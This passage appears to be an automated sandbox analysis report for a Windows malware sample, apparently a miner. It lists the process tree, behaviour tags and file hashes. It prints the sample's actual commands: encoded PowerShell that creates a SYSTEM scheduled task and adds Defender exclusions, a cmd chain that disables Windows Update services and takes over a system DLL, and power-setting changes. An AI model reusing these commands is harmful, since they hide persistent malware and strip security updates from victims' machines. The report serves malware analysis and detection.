- Suspicious use of AdjustPrivilegeToken
PID:3612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZAB4AHAAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABBAEEAWgBBAEIANgBBAEcATQBBAEkAdwBBACsAQQBDAEEAQQBVAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAMABBAFUAQQBCAHkAQQBHADgAQQBZAHcAQgBsAEEASABNAEEAYwB3AEEAZwBBAEMAMABBAFIAZwBCAHAAQQBHAHcAQQBaAFEAQgBRAEEARwBFAEEAZABBAEIAbwBBAEMAQQBBAEoAdwBCAEQAQQBEAG8AQQBYAEEAQgBRAEEASABJAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHQAQQBDAEEAQQBSAGcAQgBwAEEARwB3AEEAWgBRAEIAegBBAEYAdwBBAE4AQQBBAHkAQQBEAE0AQQBOAFEAQQAxAEEARABNAEEATQBnAEEAMgBBAEQARQBBAEwAUQBCAE8AQQBEAFUAQQBNAGcAQQAxAEEARABRAEEATQBnAEEAdABBAEQAVQBBAE4AZwBCAEcAQQBFAGMAQQBVAHcAQgBJAEEARgB3AEEAWgB3AEIAegBBAEcAUQBBAE4AUQBBADAAQQBEAE0AQQBNAGcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAHQAQQBGAFkAQQBaAFEAQgB5AEEARwBJAEEASQBBAEIAUwBBAEgAVQBBAGIAZwBCAEIAQQBIAE0AQQBJAEEAQQA4AEEAQwBNAEEAYQBRAEIAMQBBAEgAawBBAFoAZwBBAGoAQQBEADQAQQAiACcAKQAgADwAIwBqAHUAdQBlACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAeQBtACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAegB4AHoAeAAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcAZwBzAGQANQA0ADMAMgAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGUAaQAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAYwAxADMANQBiADcAMgBmAGUAOQA5ADUAYwBiADcAYgBlAGEAMAAwAGEAOQBkADcAYwA3ADgAZQA4ADgAYgBlADMAOQA0ADgAMwA0AGUAMgBmADgAMwAxADcAMAAzAGMANgAxADcAMABlADcAYgAzAGQANAAzADAAZAA4ADQALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXAA0ADIAMwA1ADUAMwAyADYAMQAtAE4ANQAyADUANAAyAC0ANQA2AEYARwBTAEgAXABnAHMAZAA1ADQAMwAyAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGwAaQBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBqAGsAbQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcAZwBzAGQANQA0ADMAMgAnADsA"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4512
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHAAZAB6AGMAIwA+ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwANAAyADMANQA1ADMAMgA2ADEALQBOADUAMgA1ADQAMgAtADUANgBGAEcAUwBIAFwAZwBzAGQANQA0ADMAMgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAaQB1AHkAZgAjAD4A"1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe"C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBiAGEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBoAGoAbwAjAD4A"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:3244
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:3472 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:4248 -
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:4060 -
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:760 -
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:3128 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:3188 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:428 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
PID:5080 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:5108 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:644 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:868 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:68 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:3340 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:2344 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:568 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:1212
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:2248 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:4804
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:2100
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:4520
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:1192
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:4648
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:4696
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵PID:2108
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵PID:4436
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵PID:4872
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵PID:4508
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵PID:5084
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "afakligmufddfq"3⤵PID:4544
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe yyyqnbmbehbu1 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3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4540
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.0MB
MD5c7ad8aff4b9bcaaf8362bc46dbb335bd
SHA16da9bd46beba784cde7bce3d73963567c9efb9b0
SHA2561c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84
SHA512e6d3f7e3e73f8445c8233202b143d5a932c7b6d0ee53c77de857a825db416bc0c73d32eaea6b7720af3ee582089dbe9071426dcbf2c02bd96e2db9ac379b0aa3
-
Filesize
5.0MB
MD5c7ad8aff4b9bcaaf8362bc46dbb335bd
SHA16da9bd46beba784cde7bce3d73963567c9efb9b0
SHA2561c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84
SHA512e6d3f7e3e73f8445c8233202b143d5a932c7b6d0ee53c77de857a825db416bc0c73d32eaea6b7720af3ee582089dbe9071426dcbf2c02bd96e2db9ac379b0aa3
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD5f340953e5f0581b3d013f11aec731f56
SHA1981e609061eac5c00a087e38103782b6af9d587b
SHA2566278a8fca5d5f830695853bf1009f2d673e5f639cbe90f96f267e77c268e528d
SHA5123cee11b56acffd14d6438f33ece3bc730731d75772e6cd6dde4b445d8a631bdd04777dca6b90aa5986576b1a236fe20b8bd7aeb2cb0a7c3c3427729bb0475852
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD55d574dc518025fad52b7886c1bff0e13
SHA168217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA51221de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5e2d46bffd1d9300639cac360fac02cb4
SHA1fd2b4813c8ab610294b6759192ca05bad5bb8958
SHA25694ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3
SHA51254b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535